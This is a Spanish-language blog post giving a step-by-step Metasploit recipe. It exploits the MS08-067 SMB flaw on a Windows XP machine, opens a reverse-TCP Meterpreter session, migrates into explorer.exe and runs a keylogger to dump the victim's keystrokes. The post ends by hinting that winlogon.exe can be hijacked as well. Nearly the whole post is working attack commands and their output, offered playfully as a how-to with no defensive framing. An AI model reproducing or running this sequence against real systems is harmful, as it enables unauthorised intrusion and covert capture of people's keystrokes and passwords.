lunes, 30 de marzo de 2009

Keylogger a traves de meterpreter con metasploit.

Leyendo el blog de metasploit veo un interesante post que relata como hacer funcionar un keylogger en una sesion de meterpreter en dos patadas.

1.- Arrancamos el meta.

./msfconsole

2.- Cargamos el exploit.

use exploit/windows/smb/ms08_067_netapi

3.- Cargamos el payload.

set PAYLOAD windows/meterpreter/reverse_tcp

4.- Elegimos la victima.

set RHOST 192.168.1.3

5.- Nos declaramos culpables ;)

set LHOST 192.168.1.2

6.- Explotamos.

exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:Spanish
[*] Selected Target: Windows XP SP3 Spanish (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.3:1025)

7.- Una vez iniciada la sesion, vemos los procesos.

ps

Process list
============

PID Name Path
--- ---- ----
176 wuauclt.exe C:\WINDOWS\system32\wuauclt.exe
192 svchost.exe C:\WINDOWS\System32\svchost.exe
476 smss.exe \SystemRoot\System32\smss.exe
548 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
572 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
616 services.exe C:\WINDOWS\system32\services.exe
620 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe
628 lsass.exe C:\WINDOWS\system32\lsass.exe
732 Explorer.EXE C:\WINDOWS\Explorer.EXE
780 svchost.exe C:\WINDOWS\system32\svchost.exe
1196 svchost.exe C:\WINDOWS\system32\svchost.exe
1232 svchost.exe C:\WINDOWS\System32\svchost.exe
1292 userinit.exe C:\WINDOWS\system32\userinit.exe
1348 svchost.exe C:\WINDOWS\system32\svchost.exe
1380 igfxpers.exe C:\WINDOWS\system32\igfxpers.exe
1496 SynTPStart.exe C:\Archivos de programa\Synaptics\SynTP\SynTPStart.exe
1504 igfxtray.exe C:\WINDOWS\system32\igfxtray.exe
1512 hkcmd.exe C:\WINDOWS\system32\hkcmd.exe
1564 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1616 RTHDCPL.EXE C:\WINDOWS\RTHDCPL.EXE
1688 svchost.exe C:\WINDOWS\system32\svchost.exe
1724 svchost.exe C:\WINDOWS\system32\svchost.exe
1876 Wlan.exe C:\Archivos de programa\WLAN\USB_WLAN_Utilidad\Wlan.exe
1932 SynTPEnh.exe C:\Archivos de programa\Synaptics\SynTP\SynTPEnh.exe
1984 WMIADAP.EXE \\?\C:\WINDOWS\system32\WBEM\WMIADAP.EXE
2032 wmiprvse.exe C:\WINDOWS\system32\wbem\wmiprvse.exe

8.- Buscamos el proceso "Explorer.exe", que es el 732 y nos apropiamos de el.

migrate 732

9.- Una vez migrado, ejecutamos keyscan_start y a esperar.

10.- Ejecutamos keyscan_dump y nos volcara en pantalla lo que se haya tecleando en la victima.

Dumping captured keystrokes...
estoy escribiendo esto en el wordpad aupa

Por cierto, leo en un post posterior (valga la redundancia) que tambien nos podemos apropiar del proceso winlogon.exe :* que cada cual saque sus concluiones.
Publicado por en
Etiquetas: ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)